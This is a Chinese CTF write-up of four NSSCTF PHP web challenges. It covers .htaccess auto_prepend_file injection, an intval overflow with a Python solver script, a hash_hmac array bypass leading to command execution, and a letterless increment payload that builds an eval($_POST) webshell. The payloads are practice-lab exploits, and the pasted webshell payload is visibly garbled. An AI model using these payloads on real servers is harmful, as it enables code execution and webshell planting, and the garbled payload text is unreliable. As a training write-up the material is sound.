NSSCTF第11页（3）

[羊城杯 2020]easyphp

源码

发现会在写入文件之前会删除目录下的除了index.php的文件。写入文件的文件名和文件内容也是可控的，只不过存在过滤

stristr函数对文件内容进行过滤，该函数绕过还是简单的，只需要添加一些特殊字符就可以了，和字符串弱类型比较相似。对于文件名的正则匹配，有点没读懂怎么个条件，到底是允许字母还是不允许，测试了一下该代码环境，运行之后明白该正则条件输入.[a-z]是可以绕过该正则的，返回false

知道了这些剩下的就是利用了

既然会删除除了index.php文件，直接覆盖index.php文件是不是就可以了，尝试写入index.php文件，但是再次访问并没有什么内容。尝试写入其他的php文件中，发现只是将文件内容回显了罢了

发现靶机目录环境并不会解析php文件，所以才会原封不动返回出来内容，想到上传文件利用.htaccess配置文件执行jpg文件中的php代码，但是再进行第二次文件写入时会把之前的文件删除掉，所以不能上传两次来利用，index.php文件也不能写入。

去找了一下.htaccess文件的用法
[CTF].htaccess的使用技巧总结_.htaccess ctf_Y4tacker的博客-CSDN博客

文章给出了file被过滤的情况，正好和本次过滤吻合可以直接套用。但是在文件写入函数中还有一个参数\nHello, world,由于\n所以在写入文件之后会把后面的英文写入到下一行，根据了解这不符合当前.htaccess解析格式，不能够正常解析，所以需要在上面距离的代码后面先闭合php代码，再加上\将\n的\进行转义即可，即为?>\，闭合结果为?>\\nHello, world即可将后面的内容输出为一行

所有的细节已经分析完毕，只需要将文件名和文件内容传参即可自动解析其中的php代码，将结果输出出来了，#后面跟着任意代码执行，由于传参是一行的，所以换行的地方需要使用%0a进行代替,#用%23代替，传参测试paylaod，运行两次成功执行代码

?content=php_value auto_prepend_fi\%0Ale .htaccess%0A%23<?php system("ls")?>\&filename=.htaccess

ls /

cat /flag,因为这里他过滤掉了flag，直接用fl\ag来绕过，得到flag

[NCTF 2018]小绿草之最强大脑

看源码得到：

扫一下,

访问index.php.bak得到了源码

这里的intval函数会防止程序溢出，所以输入的大于21位的数字经过PHP处理的值会发送改变：

<?php echo intval('4200000000000000000000');?>

32位系统：2147483647 64位系统：9223372036854775807

题目是64位系统，溢出后为9223372036854775807

利用exp

复制代码

import requests
import re
import time
s = requests.Session()  # 因为要连续计算，用来保存当前会话的持续有效性
url = "http://node4.anna.nssctf.cn:28673/"
number ="4200000000000000000000"  #输入的数字
r = s.get(url)
math = ''
headers = {
    'Content-Type': 'application/x-www-form-urlencoded',
    'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/61.0',
}
while(1):
    num_pattern =re.compile(r'<div style="display:inline;">(.*?)</div>')
    num = num_pattern.findall(r.text)   #正则提取公式
    gg = "9223372036854775807"+'+'+math.join(num)[0:-1]  #拼接真实的公式
    print(gg)
    ans = eval(gg)   #利用eval直接来计算结果

    print(ans)
    data = "input={number}&ans={ans}%".format(number=number,ans=ans)

    r =s.post(url,headers=headers,data=data)
    time.sleep(1.5)  #延时1.5秒
    print(r.text)

得到flag

[羊城杯 2020]Blackcat

扫了一下，但是没啥有用的东西

看了一下wp才知道要打开.mp3网页，看源码，得到本身的源码

首先是我们传入的两个变量 $_POST\['Black-Cat-Sheriff'\]和$ _POST['One-ear']不能为空。其次就是判断 $_POST\['White-cat-monitor'\]是否存在，是则第二个加密私钥$ clandestine为$clandestine = hash_hmac('sha256', $_POST['White-cat-monitor'], $clandestine);的值，否则第二个加密私钥的值就是环境变量的getenv("clandestine");

由于我们需要让sha256加密后的 $_POST\['One-ear'\]值等于我们传入的$ _POST['Black-Cat-Sheriff']，才能成功执行传入的$_POST['One-ear']。

所以我们要让加密的公钥是我们可知的，环境变量中的公钥我们肯定是不可知的。我们只能让 $_POST\['White-cat-monitor'\]用sha256加密后的值作为公钥，那么我们也就只需要让加密后的$ clandestine值是可以被我们知道的。本地demo测试，它是不能加密数组的，否则就会报错。可以利用这一点传入White-cat-monitor[]=，这样就能让生成的加密公钥$clandestine为空，从而达到下面if判断为假。

sha2和md5相似，弱相等能用数组绕过，

第一个hash_hmac的密钥是环境变量clandestine的值,如果data传入的值为数组，那么就会返回NULL

那么第二个hash_hmac的密钥就是NULL，返回的值就只跟data有关，就是我们可控的了

可以本地执行hash_hmac函数，然后让$_POST['Black-Cat-Sheriff']的值等于他就行

最后的命令执行这里出不了网,使用;来执行多条命令

还用了echo，是有回显的，但是exec只返回命令执行结果的最后一行内容。

ls是多行显示，所以只能显示一行的内容

这里使用dir来显示文件夹内容

得到flag

羊城杯还是有很大含金量的，学了好多东西

[TQLCTF 2022]simple_bypass

看提示说是无字母rce

进来时一个登录框

注册一个进来发现和虚拟机差不多，是一个沙箱

点击好康的，f12发现了传参路径，使用了get_pic.php方法

看源码发现了base64加密

从而可以实现任意文件读取，可以获得index.php,template.html,get_pic.php的源码

get_pic.php?image=index.php

复制源码进行base64解码

PD9waHAKZXJyb3JfcmVwb3J0aW5nKDApOwppZihpc3NldCgkX1BPU1RbJ3VzZXInXSkgJiYgaXNzZXQoJF9QT1NUWydwYXNzJ10pKXsKCSRoYXNoX3VzZXIgPSBtZDUoJF9QT1NUWyd1c2VyJ10pOwoJJGhhc2hfcGFzcyA9ICd6c2YnLm1kNSgkX1BPU1RbJ3Bhc3MnXSk7CglpZihpc3NldCgkX1BPU1RbJ3B1bmN0dWF0aW9uJ10pKXsKCQkvL2ZpbHRlcgoJCWlmIChzdHJsZW4oJF9QT1NUWyd1c2VyJ10pID4gNil7CgkJCWVjaG8oIjxzY3JpcHQ+YWxlcnQoJ1VzZXJuYW1lIGlzIHRvbyBsb25nIScpOzwvc2NyaXB0PiIpOwoJCX0KCQllbHNlaWYoc3RybGVuKCRfUE9TVFsnd2Vic2l0ZSddKSA+IDI1KXsKCQkJZWNobygiPHNjcmlwdD5hbGVydCgnV2Vic2l0ZSBpcyB0b28gbG9uZyEnKTs8L3NjcmlwdD4iKTsKCQl9CgkJZWxzZWlmKHN0cmxlbigkX1BPU1RbJ3B1bmN0dWF0aW9uJ10pID4gMTAwMCl7CgkJCWVjaG8oIjxzY3JpcHQ+YWxlcnQoJ1B1bmN0dWF0aW9uIGlzIHRvbyBsb25nIScpOzwvc2NyaXB0PiIpOwoJCX0KCQllbHNlewoJCQlpZihwcmVnX21hdGNoKCcvW15cd1wvXChcKVwqPD5dLycsICRfUE9TVFsndXNlciddKSA9PT0gMCl7CgkJCQlpZiAocHJlZ19tYXRjaCgnL1teXHdcL1wqOlwuXDtcKFwpXG48Pl0vJywgJF9QT1NUWyd3ZWJzaXRlJ10pID09PSAwKXsKCQkJCQkkX1BPU1RbJ3B1bmN0dWF0aW9uJ10gPSBwcmVnX3JlcGxhY2UoIi9bYS16LEEtWiwwLTk+XD9dLyIsIiIsJF9QT1NUWydwdW5jdHVhdGlvbiddKTsKCQkJCQkkdGVtcGxhdGUgPSBmaWxlX2dldF9jb250ZW50cygnLi90ZW1wbGF0ZS5odG1sJyk7CgkJCQkJJGNvbnRlbnQgPSBzdHJfcmVwbGFjZSgiX19VU0VSX18iLCAkX1BPU1RbJ3VzZXInXSwgJHRlbXBsYXRlKTsKCQkJCQkkY29udGVudCA9IHN0cl9yZXBsYWNlKCJfX1BBU1NfXyIsICRoYXNoX3Bhc3MsICRjb250ZW50KTsKCQkJCQkkY29udGVudCA9IHN0cl9yZXBsYWNlKCJfX1dFQlNJVEVfXyIsICRfUE9TVFsnd2Vic2l0ZSddLCAkY29udGVudCk7CgkJCQkJJGNvbnRlbnQgPSBzdHJfcmVwbGFjZSgiX19QVU5DX18iLCAkX1BPU1RbJ3B1bmN0dWF0aW9uJ10sICRjb250ZW50KTsKCQkJCQlmaWxlX3B1dF9jb250ZW50cygnc2FuZGJveC8nLiRoYXNoX3VzZXIuJy5waHAnLCAkY29udGVudCk7CgkJCQkJZWNobygiPHNjcmlwdD5hbGVydCgnU3VjY2Vzc2VkIScpOzwvc2NyaXB0PiIpOwoJCQkJfQoJCQkJZWxzZXsKCQkJCQllY2hvKCI8c2NyaXB0PmFsZXJ0KCdJbnZhbGlkIGNoYXJzIGluIHdlYnNpdGUhJyk7PC9zY3JpcHQ+Iik7CgkJCQl9CgkJCX0KCQkJZWxzZXsKCQkJCWVjaG8oIjxzY3JpcHQ+YWxlcnQoJ0ludmFsaWQgY2hhcnMgaW4gdXNlcm5hbWUhJyk7PC9zY3JpcHQ+Iik7CgkJCX0KCQl9Cgl9CgllbHNlewoJCXNldGNvb2tpZSgidXNlciIsICRfUE9TVFsndXNlciddLCB0aW1lKCkrMzYwMCk7CgkJc2V0Y29va2llKCJwYXNzIiwgJGhhc2hfcGFzcywgdGltZSgpKzM2MDApOwoJCUhlYWRlcigiTG9jYXRpb246c2FuZGJveC8kaGFzaF91c2VyLnBocCIpOwoJfQp9Cj8+Cgo8IWRvY3R5cGUgaHRtbD4KPGh0bWwgbGFuZz0iemgiPgo8aGVhZD4KCTxtZXRhIGNoYXJzZXQ9IlVURi04Ij4KCTxtZXRhIGh0dHAtZXF1aXY9IlgtVUEtQ29tcGF0aWJsZSIgY29udGVudD0iSUU9ZWRnZSxjaHJvbWU9MSI+IAoJPG1ldGEgbmFtZT0idmlld3BvcnQiIGNvbnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLjAiPgoJPHRpdGxlPlNpbXBsZSBMaW51eDwvdGl0bGU+Cgk8bGluayByZWw9InN0eWxlc2hlZXQiIHR5cGU9InRleHQvY3NzIiBocmVmPSJjc3Mvc3R5bGVzLmNzcyI+Cgk8IS0tW2lmIElFXT4KCQk8c2NyaXB0IHNyYz0iaHR0cDovL2xpYnMuYmFpZHUuY29tL2h0bWw1c2hpdi8zLjcvaHRtbDVzaGl2Lm1pbi5qcyI+PC9zY3JpcHQ+Cgk8IVtlbmRpZl0tLT4KPC9oZWFkPgo8Ym9keT4KCTxkaXYgY2xhc3M9ImpxMjItY29udGFpbmVyIiBzdHlsZT0icGFkZGluZy10b3A6MTAwcHgiPgoJCTxkaXYgY2xhc3M9ImxvZ2luLXdyYXAiPgoJCQk8ZGl2IGNsYXNzPSJsb2dpbi1odG1sIj4KCQkJCTxpbnB1dCBpZD0idGFiLTEiIHR5cGU9InJhZGlvIiBuYW1lPSJ0YWIiIGNsYXNzPSJzaWduLWluIiBjaGVja2VkPjxsYWJlbCBmb3I9InRhYi0xIiBjbGFzcz0idGFiIj5TaWduIEluPC9sYWJlbD4KCQkJCTxpbnB1dCBpZD0idGFiLTIiIHR5cGU9InJhZGlvIiBuYW1lPSJ0YWIiIGNsYXNzPSJzaWduLXVwIj48bGFiZWwgZm9yPSJ0YWItMiIgY2xhc3M9InRhYiI+U2lnbiBVcDwvbGFiZWw+CgkJCQk8ZGl2IGNsYXNzPSJsb2dpbi1mb3JtIj4KCQkJCQk8Zm9ybSBhY3Rpb249ImluZGV4LnBocCIgbWV0aG9kPSJwb3N0Ij4KCQkJCQkJPGRpdiBjbGFzcz0ic2lnbi1pbi1odG0iPgoJCQkJCQkJPGRpdiBjbGFzcz0iZ3JvdXAiPgoJCQkJCQkJCTxsYWJlbCBmb3I9InVzZXIiIGNsYXNzPSJsYWJlbCI+VXNlcm5hbWU8L2xhYmVsPgoJCQkJCQkJCTxpbnB1dCBpZD0idXNlciIgbmFtZT0idXNlciIgdHlwZT0idGV4dCIgY2xhc3M9ImlucHV0Ij4KCQkJCQkJCTwvZGl2PgoJCQkJCQkJPGRpdiBjbGFzcz0iZ3JvdXAiPgoJCQkJCQkJCTxsYWJlbCBmb3I9InBhc3MiIGNsYXNzPSJsYWJlbCI+UGFzc3dvcmQ8L2xhYmVsPgoJCQkJCQkJCTxpbnB1dCBpZD0icGFzcyIgbmFtZT0icGFzcyIgdHlwZT0icGFzc3dvcmQiIGNsYXNzPSJpbnB1dCIgZGF0YS10eXBlPSJwYXNzd29yZCI+CgkJCQkJCQk8L2Rpdj4KCQkJCQkJCTwhLS0gPGRpdiBjbGFzcz0iZ3JvdXAiPgoJCQkJCQkJCTxpbnB1dCBpZD0iY2hlY2siIHR5cGU9ImNoZWNrYm94IiBjbGFzcz0iY2hlY2siIGNoZWNrZWQ+CgkJCQkJCQkJPGxhYmVsIGZvcj0iY2hlY2siPjxzcGFuIGNsYXNzPSJpY29uIj48L3NwYW4+IEtlZXAgbWUgU2lnbmVkIGluPC9sYWJlbD4KCQkJCQkJCTwvZGl2PiAtLT4KCQkJCQkJCTxkaXYgY2xhc3M9Imdyb3VwIj4KCQkJCQkJCQk8aW5wdXQgdHlwZT0ic3VibWl0IiBjbGFzcz0iYnV0dG9uIiB2YWx1ZT0iU2lnbiBJbiI+CgkJCQkJCQk8L2Rpdj4KCQkJCQkJCTxkaXYgY2xhc3M9ImhyIj48L2Rpdj4KCQkJCQkJCTwhLS0gPGRpdiBjbGFzcz0iZm9vdC1sbmsiPgoJCQkJCQkJCTxhIGhyZWY9IiNmb3Jnb3QiPkZvcmdvdCBQYXNzd29yZD88L2E+CgkJCQkJCQk8L2Rpdj4gLS0+CgkJCQkJCTwvZGl2PgoJCQkJCTwvZm9ybT4KCQkJCQk8Zm9ybSBhY3Rpb249ImluZGV4LnBocCIgbWV0aG9kPSJwb3N0Ij4KCQkJCQkJPGRpdiBjbGFzcz0ic2lnbi11cC1odG0iPgoJCQkJCQkJPGRpdiBjbGFzcz0iZ3JvdXAiPgoJCQkJCQkJCTxsYWJlbCBmb3I9InVzZXIiIGNsYXNzPSJsYWJlbCI+VXNlcm5hbWU8L2xhYmVsPgoJCQkJCQkJCTxpbnB1dCBpZD0idXNlciIgbmFtZT0idXNlciIgdHlwZT0idGV4dCIgY2xhc3M9ImlucHV0Ij4KCQkJCQkJCTwvZGl2PgoJCQkJCQkJPGRpdiBjbGFzcz0iZ3JvdXAiPgoJCQkJCQkJCTxsYWJlbCBmb3I9InBhc3MiIGNsYXNzPSJsYWJlbCI+UGFzc3dvcmQ8L2xhYmVsPgoJCQkJCQkJCTxpbnB1dCBpZD0icGFzcyIgbmFtZT0icGFzcyIgdHlwZT0icGFzc3dvcmQiIGNsYXNzPSJpbnB1dCIgZGF0YS10eXBlPSJwYXNzd29yZCI+CgkJCQkJCQk8L2Rpdj4KCQkJCQkJCTxkaXYgY2xhc3M9Imdyb3VwIj4KCQkJCQkJCQk8bGFiZWwgZm9yPSJwYXNzIiBjbGFzcz0ibGFiZWwiPllvdXIgV2Vic2l0ZTwvbGFiZWw+CgkJCQkJCQkJPGlucHV0IGlkPSJwYXNzIiBuYW1lPSJ3ZWJzaXRlIiB0eXBlPSJ0ZXh0IiBjbGFzcz0iaW5wdXQiPgoJCQkJCQkJPC9kaXY+CgkJCQkJCQk8ZGl2IGNsYXNzPSJncm91cCI+CgkJCQkJCQkJPGxhYmVsIGZvcj0icGFzcyIgY2xhc3M9ImxhYmVsIj5Zb3VyIFB1bmN0dWF0aW9uPC9sYWJlbD4KCQkJCQkJCQk8aW5wdXQgaWQ9InBhc3MiIG5hbWU9InB1bmN0dWF0aW9uIiB0eXBlPSJ0ZXh0IiBjbGFzcz0iaW5wdXQiPgoJCQkJCQkJPC9kaXY+CgkJCQkJCQk8ZGl2IGNsYXNzPSJncm91cCI+CgkJCQkJCQkJPGlucHV0IHR5cGU9InN1Ym1pdCIgY2xhc3M9ImJ1dHRvbiIgdmFsdWU9IlNpZ24gVXAiPgoJCQkJCQkJPC9kaXY+CgkJCQkJCQk8ZGl2IGNsYXNzPSJociI+PC9kaXY+CgkJCQkJCQk8ZGl2IGNsYXNzPSJmb290LWxuayI+CgkJCQkJCQkJPGxhYmVsIGZvcj0idGFiLTEiPkFscmVhZHkgTWVtYmVyPzwvYT4KCQkJCQkJCTwvZGl2PgoJCQkJCQk8L2Rpdj4KCQkJCQk8L2Zvcm0+CgkJCQk8L2Rpdj4KCQkJPC9kaXY+CgkJPC9kaXY+Cgk8L2Rpdj4KCQo8L2JvZHk+CjwvaHRtbD4=

关键代码

<?php

error_reporting(0);
if(isset( $_POST\['user'\]) \&\& isset($ _POST['pass'])){
$hash_user = md5($ _POST['user']);
$hash_pass = 'zsf'.md5($ _POST['pass']);

if(isset($_POST['punctuation'])){

//filter

if (strlen($_POST['user']) > 6){

echo("<script>alert('Username is too long!');</script>");

}

elseif(strlen($_POST['website']) > 25){

echo("<script>alert('Website is too long!');</script>");

}

elseif(strlen($_POST['punctuation']) > 1000){

echo("<script>alert('Punctuation is too long!');</script>");

}

else{

if(preg_match('/[^\w\/\*<>]/', $_POST['user']) === 0){
if (preg_match('/[^\w\/\*:\.\;\n<>]/', $_POST['website']) === 0){

$_POST\['punctuation'\] = preg_replace("/\[a-z,A-Z,0-9\>\\?\]/","",$ _POST['punctuation']);

$template = file_get_contents('./template.html');

$content = str_replace("USER", $_POST['user'], $template);

$content = str_replace("PASS", $hash_pass, $content);

$content = str_replace("WEBSITE", $_POST['website'], $content);

$content = str_replace("PUNC", $_POST['punctuation'], $content);

file_put_contents('sandbox/'.$hash_user.'.php', $content);

echo("<script>alert('Successed!');</script>");

}

else{

echo("<script>alert('Invalid chars in website!');</script>");

}

}

else{

echo("<script>alert('Invalid chars in username!');</script>");

}

}

}

else{

setcookie("user", $_POST['user'], time()+3600);

setcookie("pass", $hash_pass, time()+3600);

Header("Location:sandbox/$hash_user.php");

}

}

?>

在这里可以看到user，website都做了严格的过滤并且限制输入长度

但是观察到strlen($_POST['punctuation']) > 1000，猜测这是利用的突破口

观察到是无字母数字RCE，那么大概思路就是自增构造

还看到一个 template.html，进去看看，太长了，截取了关键代码

<div id="start_block"> <a title="开始" id="start_btn"></a>

<div id="start_item">

<ul class="item admin">

<li><span class="adminImg"></span>

<?php

error_reporting(0);

$user = ((string)USER);

$pass = ((string)PASS);

if(isset( $_COOKIE\['user'\]) \&\& isset($ _COOKIE['pass']) && $_COOKIE['user'] === $user && $_COOKIE['pass'] === $pass){

echo($_COOKIE['user']);`

}

else{

die("<script>alert('Permission denied!');</script>");

}

?>

</li>

</ul>

<ul class="item">

<li><span class="sitting_btn"></span>系统设置</li>

<li><span class="help_btn"></span>使用指南 <b></b></li>

<li><span class="about_btn"></span>关于我们</li>

<li><span class="logout_btn"></span>退出系统</li>

</ul>

</div>

</div>

</div>

<a href="#" class="powered_by">PUNC</a>

分析一下，(string)__USER__会将__USER__强转成string类型。

然后利用点已经知道是无数字字母RCE，<?php被禁了，那么只能利用代码前面自带的<?php去shell

我们选择可以利用注释符注释，然后用);闭合回去，__PUNC__写exp再把下面的注释掉。

payload:

$_=\[\];$ =@" $_";$ = $_\['!'=='@'\];$ = $_;$ = $_;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ .= $__;$ .= $__;$ = $_;$ ++; $__++;$ ++; $__++;$ .= $__;$ = $_;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $___.=$ ; $__=$ ; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ .= $__;$ =''; $__=$ ; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ __++; $__++;$ .= $__;$ = $_;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ .= $__;$ = $_;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ .= $__;$ = $_;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $____.=$ ; $_=$ $____;$ ($[_]);

注册一下

//注册页面

username:a/*

passwd:a

website:a

punctuation:*/); $_=\[\];$ =@" $_";$ = $_\['!'=='@'\];$ = $_;$ = $_;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ .= $__;$ .= $__;$ = $_;$ ++; $__++;$ ++; $__++;$ .= $__;$ = $_;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $___.=$ ; $__=$ ; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ .= $__;$ =''; $__=$ ; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ __++; $__++;$ .= $__;$ = $_;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ .= $__;$ = $_;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ .= $__;$ = $_;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $__++;$ ++; $____.=$ ; $_=$ $____;$ ($[_]);/*

//这个自增代表的是eval(@POST[]);